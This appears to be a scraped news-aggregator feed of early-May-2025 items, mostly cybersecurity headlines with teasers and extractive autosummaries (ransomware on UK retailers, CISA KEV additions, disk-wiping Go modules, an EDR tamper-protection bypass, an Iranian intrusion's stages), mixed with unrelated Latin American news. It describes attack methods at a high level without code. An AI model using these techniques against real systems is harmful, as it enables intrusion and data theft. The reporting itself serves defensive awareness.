    Autosummary: A small payment amount, designed to make it more likely that you will pay up without asking questions; impersonation of a trusted toll road brand such as E-ZPass, which operates toll roads across 20 states, or even a state authority; a request for information such as driver’s license number and license plates; a link in the text message, which could covertly install malware or take you to a website to fill in personal and financial information; a phishing site also spoofed with the branding of the legitimate toll road operator. Sometimes scams are easy to spot, such as when they are sent out to drivers in states with no toll roads, such as Michigan or Wisconsin. Delete any scam texts once read and reported. What to do if you think you’ve been scammed: In the event the worst happens and you think you may have fallen victim to a toll road smishing text, don’t panic and follow these steps: freeze your bank cards and inform your bank (if you have shared financial details with the scammers); initiate a credit freeze with the three main credit reporting agencies (Experian, TransUnion, Equifax). "


    Customers complain as empty shelves continue at Co-op after hack

    ransomware
    2025-05-06 https://www.bbc.com/news/articles/cze1eg3z307o
    The retailer says "sustained malicious attempts by hackers" is affecting its IT systems. "

    Autosummary: Liv McMahon & Tom Gerken, Technology reporters. (Photo: John Walker took this photo of empty shelves in a Co-op in Llanrwst, Conwy.) Co-op customers have complained as stores are being left with empty shelves while the retailer battles with a major cyber attack disrupting deliveries of fresh stock. "


    Vuls: Open-source agentless vulnerability scanner

    exploits
    2025-05-05 https://www.helpnetsecurity.com/2025/05/05/vuls-open-source-agentless-vulnerability-scanner/

    Vuls is an open-source tool that helps users find and manage security vulnerabilities. It was created to solve the daily problems admins face when trying to keep servers secure. Many administrators choose not to use automatic software updates because they want to avoid downtime in production. Instead, they update systems manually. This creates challenges. Admins must watch databases like the National Vulnerability Database (NVD) for new threats. When there are many packages installed, tracking all … More

    The post Vuls: Open-source agentless vulnerability scanner appeared first on Help Net Security.

    "

    Autosummary: It offers compatibility with numerous Linux distributions, including Alpine (3.3 and later), Ubuntu (14.04 through 24.04), Debian (8 through 12), Red Hat Enterprise Linux (RHEL 5 through 9), Fedora (32 through 39), Oracle Linux (5 through 7), CentOS (6 through 8, including Stream 8 and 9), AlmaLinux (8 and 9), Rocky Linux (8 and 9), Amazon Linux (all versions), openSUSE (Tumbleweed), openSUSE Leap (15.2 and 15.3), SUSE Linux Enterprise (11 through 15), and Raspbian (Jessie, Stretch, Buster). Beyond Linux, Vuls extends its support to FreeBSD (versions 10 and 11), Windows (both client and server editions), and macOS (including macOS X, macOS X Server, and macOS Server). Can run offline without internet access on Red Hat, Fedora, CentOS, AlmaLinux, Rocky Linux, Oracle Linux, Ubuntu, and Debian systems. "


    Ransomware spike exposes cracks in cloud security

    exploits
    2025-05-05 https://www.helpnetsecurity.com/2025/05/05/cloud-ransomware-attacks-rubrik/

    90% of IT and security leaders said their organization experienced a cyberattack within the last year, according to a report by Rubrik. “Many organizations that move to the cloud assume their providers will handle security,” said Joe Hladik, Head of Rubrik Zero Labs. “The persistence of ransomware attacks, coupled with the exploitation of hybrid cloud vulnerabilities, shows that threat actors are always one step ahead. Companies must take action and adopt an attacker’s mindset by … More

    The post Ransomware spike exposes cracks in cloud security appeared first on Help Net Security.

    "

    Autosummary: The most common attack vectors cited were data breaches (30%), malware on devices (29%), cloud or SaaS breaches (28%), phishing (28%), and insider threats (28%). "


    US authorities have indicted Black Kingdom ransomware admin

    exploits ransomware
    2025-05-05 https://securityaffairs.com/177423/cyber-crime/us-authorities-have-indicted-black-kingdom-ransomware-admin.html
    A 36-year-old Yemeni man behind Black Kingdom ransomware is indicted in the U.S. for 1,500 attacks on Microsoft Exchange servers. U.S. authorities have indicted Rami Khaled Ahmed (aka “Black Kingdom,” of Sana’a, Yemen), a 36-year-old Yemeni national, suspected of being the administrator of the Black Kingdom ransomware operation. He is believed to have carried out […] "

    Autosummary: “According to the indictment, from March 2021 to June 2023, Ahmed and others infected computer networks of several U.S.-based victims, including a medical billing services company in Encino, a ski resort in Oregon, a school district in Pennsylvania, and a health clinic in Wisconsin. "


    A list of topics we covered in the week of April 27 to May 3 of 2025

    industry
    2025-05-05 https://www.malwarebytes.com/blog/news/2025/05/a-list-of-topics-we-covered-in-the-week-of-april-27-to-may-3-of-2025
    A list of topics we covered in the week of April 27 to May 3 of 2025 "

    Autosummary: "


    How CISOs can talk cybersecurity so it makes sense to executives

    ciber
    2025-05-05 https://www.helpnetsecurity.com/2025/05/05/ciso-talk-cybersecurity-executives/

    CISOs know cyber risk is business risk. Boards don’t always see it that way.​ For years, CISOs have struggled to get boards to understand security beyond buzzwords. Many feel they’re either ignored or misunderstood. But with threats growing and regulations tightening, that’s changing. Boards now expect CISOs to speak their language: risk, dollars, impact.​ Here’s how security leaders can get through, with real-world tips on making cybersecurity resonate in the boardroom. Translate risk into dollars … More

    The post How CISOs can talk cybersecurity so it makes sense to executives appeared first on Help Net Security.

    "

    Autosummary: “I start by estimating three things: how often something bad might happen, how much it could cost, and what the business impact could be in terms of brand, sales, or market share,” he explains. They are also more likely to be given the ability to pursue use cases for generative AI, such as creating threat detection rules, analyzing data sources, incident response and forensic investigations, and proactive threat hunting, according to recent Splunk research. Tie security to business goals: To align cybersecurity with business goals, CISOs must understand the company’s core mission and identify where security intersects with that mission. “An example of this is creating a talk track on how cybersecurity protects revenue and growth,” said Turgal. Rather than talking about malware variants or attack vectors, Turgal presents scenarios such as: “The risk of a ransomware attack this year is 5 percent, and if it happens, the average loss would be $4.5 million.” Boards now expect CISOs to speak their language: risk, dollars, impact. Here’s how security leaders can get through, with real-world tips on making cybersecurity resonate in the boardroom. "


    How OSINT supports financial crime investigations

    financial
    2025-05-05 https://www.helpnetsecurity.com/2025/05/05/stuart-clarke-blackdot-solutions-financial-crime-osint/

    In this Help Net Security interview, Stuart Clarke, CEO at Blackdot Solutions, discusses the strategic use of open-source intelligence (OSINT) in tackling financial crime. He outlines its application in areas such as fraud, sanctions evasion, and money laundering, and addresses the legal, ethical, and operational challenges involved. Clarke also provides case studies illustrating how OSINT has been used to uncover criminal networks. Are there specific financial crime typologies, such as fraud, money laundering, or sanctions … More

    The post How OSINT supports financial crime investigations appeared first on Help Net Security.

    "

    Autosummary: He outlines its application in areas such as fraud, sanctions evasion, and money laundering, and addresses the legal, ethical, and operational challenges involved. Yet open-source data is often fragmented and is spread across corporate registries, publicly available social media, news archives, the dark web, and more. What’s important to emphasise, however, is that while we can identify certain core typologies – like fraud, sanctions evasion, and money laundering – they must remain fluid. Are there specific financial crime typologies, such as fraud, money laundering, or sanctions evasion, where OSINT has proven particularly valuable? Investigators overlaid leaked names and corporate data with public registries, sanctions databases, and corporate network analysis, exposing global webs of tax evasion and illicit asset concealment by individuals and companies. "


    Review: Effective Vulnerability Management

    exploits
    2025-05-05 https://www.helpnetsecurity.com/2025/05/05/review-effective-vulnerability-management/

    Effective Vulnerability Management offers a view of a key part of cybersecurity, showing how practices, tools, and processes can help organizations reduce risk. About the authors Chris Hughes is the President of Aquia, a cybersecurity leader with 20 years of public and private sector experience, who also serves as a professor, and CISA Cyber Innovation Fellow. Nikki Robinson is a Security Architect and Professor of Practice at Capitol Technology University, with dual doctorates in Cybersecurity … More

    The post Review: Effective Vulnerability Management appeared first on Help Net Security.

    "

    Autosummary: About the authors Chris Hughes is the President of Aquia, a cybersecurity leader with 20 years of public and private sector experience, who also serves as a professor, and CISA Cyber Innovation Fellow. "


    Microsoft silently fixes Start menu bug affecting Windows 10 PCs

    exploits
    2025-05-05 https://www.bleepingcomputer.com/news/microsoft/microsoft-silently-fixes-start-menu-bug-affecting-windows-10-pcs/
    Microsoft has silently fixed an issue that broke Start Menu jump lists for all apps on systems running Windows 10, version 22H2. [...] "

    Autosummary: "


    ⚡ Weekly Recap: Nation-State Hacks, Spyware Alerts, Deepfake Malware, Supply Chain Backdoors

    exploits government
    2025-05-05 https://thehackernews.com/2025/05/weekly-recap-nation-state-hacks-spyware.html
    What if attackers aren't breaking in—they're already inside, watching, and adapting? This week showed a sharp rise in stealth tactics built for long-term access and silent control. AI is being used to shape opinions. Malware is hiding inside software we trust. And old threats are returning under new names. The real danger isn’t just the breach—it’s not knowing who’s still lurking in your "

    Autosummary: This week's list includes — CVE-2025-3928 (Commvault Web Server), CVE-2025-1976 (Broadcom Brocade Fabric OS), CVE-2025-46271, CVE-2025-46272, CVE-2025-46273, CVE-2025-46274, CVE-2025-46275 (Planet Technology), CVE-2025-23016 (FastCGI), CVE-2025-43864 (React Router), CVE-2025-21756 (Linux Kernel), CVE-2025-31650 (Apache Tomcat), CVE-2025-46762 (Apache Parquet), CVE-2025-2783 (Google Chrome), CVE-2025-23242, CVE-2025-23243 (NVIDIA Riva), CVE-2025-23254 (NVIDIA TensorRT-LLM), CVE-2025-3500 (Avast Free Antivirus), CVE-2025-32354 (Zimbra Collaboration Server), CVE-2025-4095 (Docker), CVE-2025-30194 (PowerDNS), CVE-2025-32817 (SonicWall Connect Tunnel Windows Client), CVE-2025-29953 (Apache ActiveMQ), CVE-2025-4148, CVE-2025-4149, CVE-2025-4150 (NETGEAR), CVE-2025-2082 (Tesla Model 3), CVE-2025-3927 (Digigram PYKO-OUT), CVE-2025-24522, CVE-2025-32011, CVE-2025-35996, CVE-2025-36558 (KUNBUS Revolution Pi), CVE-2025-35975, CVE-2025-36521 (MicroDicom DICOM Viewer), CVE-2025-2774 (Webmin), CVE-2025-29471 (Nagios), and CVE-2025-32434 (PyTorch).
    Flaws Disclosed in Jan AI — Multiple security flaws (CVE-2025-2439, CVE-2025-2445, CVE-2025-2446, and CVE-2025-2447) have been disclosed in Menlo Research's Jan AI, an offline ChatGPT alternative, that could be exploited by remote, unauthenticated attackers to manipulate systems. "With vulnerabilities ranging from missing CSRF protection of state-changing endpoints to command injection, an attacker can leverage these to take control of a self-hosted server or issue drive-by attacks against LLM developers," Snyk said.
    End-of-Life Security Disclosures — Tech giants Cisco, Dell Technologies, IBM, Microsoft, Oracle, Red Hat, and others have teamed up for a new OpenEoX framework that hopes to standardize end-of-life (EoL) and end-of-support (EoS) information to better protect the supply chain and combat cybersecurity risks linked to unsupported software and hardware. "OpenEoX introduces a much-needed, unified framework designed to streamline the exchange of end-of-life (EoL) and end-of-security-support (EoSSec) data that enables transparency and efficiency," said Omar Santos, OpenEoX co-chair and Cisco Distinguished Engineer.
    The intrusions are said to have relied on phishing, vulnerability exploitation (e.g., CVE-2023-23397), poorly-secured edge devices, and brute-force attacks against webmail as initial access vectors, while also repeatedly targeting Roundcube email servers to exfiltrate inbox data and using phishing emails to distribute malware families like HeadLace and OCEANMAP, while attempting to evade detection by hiding behind low-cost and ready-to-use outsourced infrastructure.
    The proposed legislation mandates the Department of Commerce to assess the risks posed by routers, modems, and other devices developed, manufactured, or supplied by its adversaries like China, Russia, Iran, North Korea, Cuba, or Venezuela.
    Known as OTF GRIMM, the task force seeks to disrupt violence-as-a-service and brings together law enforcement authorities from Belgium, Denmark, Finland, France, Germany, the Netherlands, and Norway.
    Two Arrested in Connection With JokerOTP Operation — Two individuals, a 24-year-old man from Middlesbrough and a 30-year-old from the Oost-Brabant region of The Netherlands, have been arrested in a joint international operation dismantling JokerOTP, a sophisticated phishing tool used to intercept two-factor authentication (2FA) codes and steal over £7.5 million.
    In a statement shared with WIRED, security researcher and cryptographer Matt Green said "any end-to-end encrypted system that uses off-device AI inference is going to be riskier than a pure end-to-end system" and that "more private data will go off the device, and the machines that process this data will be a target for hackers and nation-state adversaries."
    "When, as a result of the fraudulent attack, the victim comes to the ATM to deposit money into their account, they will place their smartphone on the ATM's NFC module, but instead of their card, they will log in with the drop card, to whom the entire amount will be sent."
    "Where compromised, hosts remain vulnerable to the delivery of any payload the operators choose to deliver, whether of their own or sold as Pay-Per-Install or Malware-as-a-Service on underground markets," the company said. "


    UK shares security tips after major retail cyberattacks

    ciber
    2025-05-05 https://www.bleepingcomputer.com/news/security/uk-shares-security-tips-after-major-retail-cyberattacks/
    Following three high-profile cyberattacks impacting major UK retailers, the country's National Cyber Security Centre (NCSC) has published guidance that all companies are advised to follow to strengthen their cybersecurity defenses. [...] "

    Autosummary: However, BleepingComputer has learned that both the M&S and Co-op attacks have been attributed to hackers utilizing tactics commonly associated with Scattered Spider, Lapsus$, and other threat actors who frequent the same Telegram channels, Discord servers, and hacking forums. "


    New "Bring Your Own Installer" EDR bypass used in ransomware attack

    exploits ransomware
    2025-05-05 https://www.bleepingcomputer.com/news/security/new-bring-your-own-installer-edr-bypass-used-in-ransomware-attack/
    A new "Bring Your Own Installer" EDR bypass technique is exploited in attacks to bypass SentinelOne's tamper protection feature, allowing threat actors to disable endpoint detection and response (EDR) agents to install the Babuk ransomware. [...] "

    Autosummary: The mitigation is to enable the "Online Authorization" feature in the Sentinel Policy settings that, when enabled, requires approval from the SentinelOne management console before local upgrades, downgrades, or uninstalls of the agent can occur. "


    Darcula PhaaS steals 884,000 credit cards via phishing texts

    financial
    2025-05-05 https://www.bleepingcomputer.com/news/security/darcula-phaas-steals-884-000-credit-cards-via-phishing-texts/
    The Darcula phishing-as-a-service (PhaaS) platform stole 884,000 credit cards from 13 million clicks on malicious links sent via text messages to targets worldwide. [...] "

    Autosummary: In February 2025, the same researchers reported that Darcula had undergone a significant evolution, now allowing operators to auto-generate phishing kits for any brand, while also implementing new stealth features, a credit card to virtual card converter, and a simplified admin panel. "


    Commvault CVE-2025-34028 Added to CISA KEV After Active Exploitation Confirmed

    exploits
    2025-05-05 https://thehackernews.com/2025/05/commvault-cve-2025-34028-added-to-cisa.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a maximum-severity security flaw impacting Commvault Command Center to its Known Exploited Vulnerabilities (KEV) catalog, a little over a week after it was publicly disclosed. The vulnerability in question is CVE-2025-34028 (CVSS score: 10.0), a path traversal bug that affects 11.38 Innovation Release, from versions "

    Autosummary: "


    Kelly Benefits December data breach impacted over 400,000 individuals

    financial
    2025-05-05 https://securityaffairs.com/177476/data-breach/kelly-benefits-december-data-breach-impacted-over-400000-individuals.html
    Kelly Benefits has determined that the impact of the recently disclosed data breach is much bigger than initially believed. Benefits and payroll solutions firm Kelly & Associates Insurance Group, aka Kelly Benefits, announced that the impact of a recently disclosed data breach is much bigger than initially estimated. The U.S.-based company provides benefits, payroll, and […] "

    Autosummary: Kelly Benefits is notifying affected individuals on behalf of multiple customers, including CareFirst, Guardian, Beam Benefits, and others impacted by the breach. "


    Week in review: Critical SAP NetWeaver flaw exploited, RSAC 2025 Conference

    exploits
    2025-05-04 https://www.helpnetsecurity.com/2025/05/04/week-in-review-critical-sap-netweaver-flaw-exploited-rsac-2025-conference/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: RSAC 2025 Conference RSAC 2025 Conference took place at the Moscone Center in San Francisco. Check out our microsite for related news, photos, product releases, and more. Critical SAP NetWeaver flaw exploited by suspected initial access broker (CVE-2025-31324) CVE-2025-31324, a critical vulnerability in the SAP NetWeaver platform, is being actively exploited by attackers to upload malicious webshells to enable unauthorized … More

    The post Week in review: Critical SAP NetWeaver flaw exploited, RSAC 2025 Conference appeared first on Help Net Security.

    "

    Autosummary: Infosec products of the month: April 2025 Here’s a look at the most interesting products from the past month, featuring releases from: 1touch.io, Abnormal AI, AppViewX, Arctic Wolf Networks, Bitdefender, BitSight, Bugcrowd, Cato Networks, CyberQP, Cyware, Entrust, Exabeam, Flashpoint, Forescout, Index Engines, Jit, LastPass, PlexTrac, PowerDMARC, RunSafe Security, Saviynt, Seal Security, Seemplicity, Skyhawk Security, Stellar Cyber, Swimlane, Varonis, and Veracode. Online fraud peaks as breaches rise In this Help Net Security video, Steve Yin, Global Head of Fraud at TransUnion, and Brad Daughdrill, VP, Data Science, Head of Global Fraud Analytics, TransUnion, discuss their latest fraud report focused on data breaches and their severity and impact on financial business. Download: Edgescan 2025 Vulnerability Statistics Report Edgescan’s 2025 Vulnerability Statistics Report explores risk density patterns across network/device and application layers, uncovers complex vulnerabilities that automated tools consistently miss, and evaluates the real-world effectiveness of leading vulnerability scoring methodologies, including EPSS, CISA KEV, CVSS, and our proprietary EVSS system. "


    StealC malware enhanced with stealth upgrades and data theft tools

    exploits
    2025-05-04 https://www.bleepingcomputer.com/news/security/stealc-malware-enhanced-with-stealth-upgrades-and-data-theft-tools/
    The creators of StealC, a widely-used information stealer and malware downloader, have released its second major version, bringing multiple stealth and data theft enhancements. [...] "

    Autosummary: (Image: StealC v2 new admin panel. Source: Zscaler.) However, apart from the feature additions, there have also been some notable removals, like the anti-VM checks and DLL downloading/execution. "


    Malicious Go Modules designed to wipe Linux systems

    Linux
    2025-05-04 https://securityaffairs.com/177411/malware/malicious-go-modules-designed-to-wipe-linux-systems.html
    Researchers found 3 malicious Go modules with hidden code that can download payloads to wipe a Linux system’s main disk, making it unbootable. The malicious modules contain obfuscated code to fetch next-stage payloads that can wipe a Linux system’s primary disk and make it unbootable. “Socket’s Threat Research Team uncovered a stealthy and highly destructive […] "

    Autosummary: Malicious Go Modules designed to wipe Linux systems, Pierluigi Paganini, May 04, 2025. Researchers found 3 malicious Go modules with hidden code that can download payloads to wipe a Linux system’s main disk, making it unbootable. "


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 44

    exploits
    2025-05-04 https://securityaffairs.com/177401/malware/security-affairs-malware-newsletter-round-44.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape io_uring Is Back, This Time as a Rootkit   I StealC You: Tracking the Rapid Changes To StealC Interesting WordPress Malware Disguised as Legitimate Anti-Malware Plugin Using Trusted Protocols Against You: Gmail as a C2 Mechanism         […] "

    Autosummary: "


    Brazil police thwart bomb attack on Lady Gaga concert

    latam
    2025-05-04 https://www.bbc.com/news/articles/c209r5pqzneo
    Police say the plan was orchestrated by a group promoting hate speech and the radicalisation of teenagers. "

    Autosummary: The person responsible for the plan and a teenager were arrested, the police said on X. The Civil Police of Rio de Janeiro state, in co-ordination with the justice ministry, said suspects had recruited participants to carry out attacks using improvised explosives and the plan was aimed at gaining notoriety on social media. "


    Peru kidnapping leaves 13 dead in gold mine

    latam
    2025-05-04 https://www.bbc.com/news/articles/ce3vdw5ek9qo
    Miners were kidnapped and killed in a Peruvian gold mine after a confrontation with a criminal gang. "

    Autosummary: "


    Colombia's wind farms bring promise and pain for indigenous group

    latam
    2025-05-04 https://www.bbc.com/news/articles/ckg2ekjjgldo
    The South American country is turning to wind power, but some local people are unhappy. "

    Autosummary: The Wayuu indigenous group, which Mr Iguarán belongs to, has lived on the arid peninsula region for centuries, herding goats, tending to crops, mining salt, and fishing. (Photo, Catherine Ellis: The Guajira 1 wind farm is very close to José Luis Iguarán's home.) "The wind farms produce clean energy, but they create division within the Wayuu communities," explains Aaron Laguna, a Wayuu fisherman, who lives in the coastal village of Cabo de la Vela. The energy company behind it, Colombian firm Isagen, has paid for them to have access to clean drinking water, better roads, and sturdy brick houses, which have replaced some of the mud and cactus ones. "


    Brazil social security minister latest to quit in major pension fraud scandal

    latam
    2025-05-03 https://www.bbc.com/news/articles/c0jz0wwgz95o
    The scheme allegedly saw pensioners defrauded of payments, with the diverted money shared among corrupt officials. "

    Autosummary: "


    U.S. Charges Yemeni Hacker Behind Black Kingdom Ransomware Targeting 1,500 Systems

    exploits ransomware
    2025-05-03 https://thehackernews.com/2025/05/us-charges-yemeni-hacker-behind-black.html
    The U.S. Department of Justice (DoJ) on Thursday announced charges against a 36-year-old Yemeni national for allegedly deploying the Black Kingdom ransomware against global targets, including businesses, schools, and hospitals in the United States. Rami Khaled Ahmed of Sana'a, Yemen, has been charged with one count of conspiracy, one count of intentional damage to a protected computer, and one "

    Autosummary: The ransomware payment resolution rate for the period has been tallied at 27%, down from 85% in Q1 2019, 73% in Q1 2020, 56% in Q1 2021, 46% in Q1 2022, 45% in Q1 2023, and 28% in Q1 2024. "From March 2021 to June 2023, Ahmed and others infected computer networks of several U.S.-based victims, including a medical billing services company in Encino, a ski resort in Oregon, a school district in Pennsylvania, and a health clinic in Wisconsin," the DoJ said in a statement. Leonidas Varagiannis (aka War), 21, and Prasan Nepal (aka Trippy), 20, the two alleged leaders of a child extortion group 764 have been arrested and charged with directing and distributing child sexual abuse material (CSAM). "


    Iranian Hackers Maintain 2-Year Access to Middle East CNI via VPN Flaws and Malware

    exploits
    2025-05-03 https://thehackernews.com/2025/05/iranian-hackers-maintain-2-year-access.html
    An Iranian state-sponsored threat group has been attributed to a long-term cyber intrusion aimed at a critical national infrastructure (CNI) in the Middle East that lasted nearly two years. The activity, which lasted from at least May 2023 to February 2025, entailed "extensive espionage operations and suspected network prepositioning – a tactic often used to maintain persistent access for future "

    Autosummary: The attack analyzed by Fortinet against the CNI entity unfolded over four stages starting from May 2023, employing an evolving arsenal of tools as the victim enacted countermeasures. 15 May, 2023 – 29 April, 2024: establishing a foothold by using stolen login credentials to access the victim's SSL VPN system, dropping web shells on public-facing servers, and deploying three backdoors, Havoc, HanifNet, and HXLibrary, for long-term access. 30 April, 2024 – 22 November, 2024: consolidating the foothold by planting more web shells and an additional backdoor called NeoExpressRAT, using tools like plink and Ngrok to burrow deeper into the network, performing targeted exfiltration of the victim's emails, and conducting lateral movement to the virtualization infrastructure. 23 November, 2024 – 13 December, 2024: deploying more web shells and two more backdoors, MeshCentral Agent and SystemBC, in response to initial containment and remediation steps undertaken by the victim. 14 December, 2024 – Present: attempts to infiltrate the network again by exploiting known Biotime vulnerabilities (CVE-2023-38950, CVE-2023-38951, and CVE-2023-38952) and spear-phishing attacks aimed at 11 of the employees to harvest Microsoft 365 credentials after the victim successfully removed the adversary's access. It's worth noting that both Havoc and MeshCentral are open-source tools that function as a command-and-control (C2) framework and remote monitoring and management (RMM) software, respectively. "


    U.S. CISA adds Yii Framework and Commvault Command Center flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-05-03 https://securityaffairs.com/177367/hacking/u-s-cisa-adds-yii-framework-and-commvault-command-center-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Yii Framework and Commvault Command Center flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these flaws: […] "

    Autosummary: Below are the descriptions for these flaws: CVE-2025-34028 Commvault Command Center Path Traversal Vulnerability; CVE-2024-58136 Yiiframework Yii Improper Protection of Alternate Path Vulnerability. The vulnerability CVE-2025-34028 (CVSS score of 10) is a path traversal vulnerability in Commvault Command Center Innovation. An unauthenticated attacker can exploit the flaw to upload ZIP files, which, when expanded by the target server, could result in Remote Code Execution. "


    Malicious Go Modules Deliver Disk-Wiping Linux Malware in Advanced Supply Chain Attack

    exploits Linux
    2025-05-03 https://thehackernews.com/2025/05/malicious-go-modules-deliver-disk.html
    Cybersecurity researchers have discovered three malicious Go modules that include obfuscated code to fetch next-stage payloads that can irrevocably overwrite a Linux system's primary disk and render it unbootable. The names of the packages are listed below - github[.]com/truthfulpharm/prototransform github[.]com/blankloggia/go-mcp github[.]com/steelpoor/tlsproxy "Despite appearing legitimate, "

    Autosummary: The packages, which have since been removed, are as follows - cfc-bsb (2,913 downloads) coffin2022 (6,571 downloads) coffin-codes-2022 (18,126 downloads) coffin-codes-net (6,144 downloads) coffin-codes-net2 (6,238 downloads) coffin-codes-pro (9,012 downloads) coffin-grave (6,544 downloads) The packages use hard-coded Gmail account credentials to sign in to the service's SMTP server and send a message to another Gmail address to signal a successful compromise. "


    Rhysida Ransomware gang claims the hack of the Government of Peru

    exploits latam government ransomware
    2025-05-03 https://securityaffairs.com/177388/cyber-crime/rhysida-ransomware-gang-claims-the-hack-of-the-government-of-peru.html
    The Rhysida Ransomware gang claims the hack of the Government of Peru: the gang breached Gob.pe, the Single Digital Platform of the Peruvian State. The Rhysida ransomware gang claims responsibility for hacking the Government of Peru, breaching Gob.pe, which is the country’s official digital platform. The group published the images of multiple documents allegedly stolen […] "

    Autosummary: "


    DragonForce group claims the theft of data after Co-op cyberattack

    ciber
    2025-05-03 https://securityaffairs.com/177376/cyber-crime/dragonforce-group-claims-the-theft-of-data-after-co-op-cyberattack.html
    Hackers claim the Co-op cyberattack is worse than admitted, with major customer and employee data stolen, and provide proof to the BBC. The attackers behind the recent Co-op cyberattack, who go online by the name DragonForce, told the BBC that they had stolen data from the British retailer and provided proof of the data breach. Hackers […] "

    Autosummary: “This data includes Co-op Group members’ personal data such as names and contact details, and did not include members’ passwords, bank or credit card details, transactions or information relating to any members’ or customers’ products or services with the Co-op Group,” a spokesperson told BBC. "


    Crowds flock to free Lady Gaga concert in Brazil

    latam
    2025-05-03 https://www.bbc.com/news/articles/c705p98d0kgo
    Lady Gaga fans gather for a massive concert on Copacabana beach, paid for by Rio de Janeiro city to help boost the economy. "

    Autosummary: "I can't wait for her to sing Abracadabra, it's great to dance to, like her early stuff," he said. "


    AI and automation shift the cybersecurity balance toward attackers

    ciber
    2025-05-02 https://www.helpnetsecurity.com/2025/05/02/threat-actors-automation-cybersecurity/

    Threat actors are increasingly harnessing automation, commoditized tools, and AI to systematically erode the traditional advantages held by defenders, according to Fortinet.

    The post AI and automation shift the cybersecurity balance toward attackers appeared first on Help Net Security.

    "

    Autosummary: In addition to zero-day vulnerabilities circulating on the darknet, initial access brokers are increasingly offering corporate credentials (20%), RDP access (19%), admin panels (13%), and web shells (12%). "


    Phone theft is turning into a serious cybersecurity risk

    ciber
    2025-05-02 https://www.helpnetsecurity.com/2025/05/02/phone-theft-cybersecurity-threat/

    Phone theft is a rising issue worldwide, and it’s more than just a property crime. It’s a serious cybersecurity threat. In the UK alone, the Metropolitan Police seizes 1,000 phones each week. Stolen phones don’t just go to local black markets. They often get funneled into larger criminal operations. For example, stolen phones can be used to bypass security features or be reprogrammed and resold. In 2024, Europol uncovered a massive phishing network that affected … More

    The post Phone theft is turning into a serious cybersecurity risk appeared first on Help Net Security.

    "

    Autosummary: In cities like Shenzhen, known as the “Silicon Valley of China,” stolen phones are trafficked to tech companies or underground operations, where they are either dismantled for parts or resold after being tampered with. For laptops, typical steps include promptly reporting the theft, remotely locking or wiping the device, and revoking access to company systems. Mobile device security risks: according to Verizon’s 2024 Mobile Security Index, 80% of organizations consider mobile devices critical to their operations. Ensure personal devices connecting to company systems are secure (encrypted, updated OS, etc.). "


    Microsoft fixes Exchange Online bug flagging Gmail emails as spam

    exploits
    2025-05-02 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-exchange-online-bug-flagging-gmail-emails-as-spam/
    Microsoft has resolved an issue with a machine learning model that mistakenly flagged emails from Gmail accounts as spam in Exchange Online. [...] "

    Autosummary: "


    How to Automate CVE and Vulnerability Advisory Response with Tines

    exploits
    2025-05-02 https://thehackernews.com/2025/05/how-to-automate-cve-and-vulnerability.html
    Run by the team at workflow orchestration and AI platform Tines, the Tines library features pre-built workflows shared by security practitioners from across the community - all free to import and deploy through the platform’s Community Edition. A recent standout is a workflow that automates monitoring for security advisories from CISA and other vendors, enriches advisories with CrowdStrike "

    Autosummary: Key benefits of this workflow: reduces manual effort and speeds up response time; leverages threat intelligence for smarter prioritization; ensures consistent handling of new vulnerabilities; strengthens collaboration across security and IT teams; boosts morale by eliminating tedious tasks; keeps analysts in control with easy, fast approvals. Workflow overview. Tools used: Tines – workflow orchestration and AI platform (Community Edition available); CrowdStrike – threat intelligence and EDR platform; ServiceNow – ticketing and ITSM platform; Slack – team collaboration platform. How it works: RSS feed collection fetches the latest advisories from CISA's RSS feed; deduplication filters out duplicate advisories; vendor filtering focuses on advisories from key vendors and services (e.g., Microsoft, Citrix, Google, Atlassian); CVE extraction identifies CVEs from advisory descriptions; enrichment cross-references CVEs with CrowdStrike threat intelligence for added context; Slack notification sends an enriched vulnerability with action buttons to a dedicated Slack channel; approval flow: if approved, the workflow creates a ServiceNow ticket; if denied, the workflow logs the decision without creating a ticket. Configuring the workflow - step-by-step guide. 1. "


    MintsLoader Drops GhostWeaver via Phishing, ClickFix — Uses DGA, TLS for Stealth Attacks

    financial
    2025-05-02 https://thehackernews.com/2025/05/mintsloader-drops-ghostweaver-via.html
    The malware loader known as MintsLoader has been used to deliver a PowerShell-based remote access trojan called GhostWeaver. "MintsLoader operates through a multi-stage infection chain involving obfuscated JavaScript and PowerShell scripts," Recorded Future's Insikt Group said in a report shared with The Hacker News. "The malware employs sandbox and virtual machine evasion techniques, a domain "

    Autosummary: Communication between GhostWeaver and its command-and-control (C2) server is secured through TLS encryption using an obfuscated, self-signed X.509 certificate embedded directly within the PowerShell script, which is leveraged for client-side authentication to the C2 infrastructure," Recorded Future said. "


    Luxury department store Harrods suffered a cyberattack

    ciber
    2025-05-02 https://securityaffairs.com/177330/cyber-crime/luxury-department-store-harrods-suffered-a-cyberattack.html
    Harrods confirmed a cyberattack, following similar incidents suffered by M&S and Co-op, making it the third major UK retailer targeted in one week. Luxury department store Harrods confirmed a cyberattack: threat actors attempted to gain unauthorised access to some of its systems. “We recently experienced attempts to gain unauthorised access to some of our systems.” […] "

    Autosummary: "


    U.S. CISA adds SonicWall SMA100 and Apache HTTP Server flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-05-02 https://securityaffairs.com/177301/hacking/u-s-cisa-adds-sonicwall-sma100-and-apache-http-server-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SonicWall SMA100 and Apache HTTP Server flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these flaws: […] "

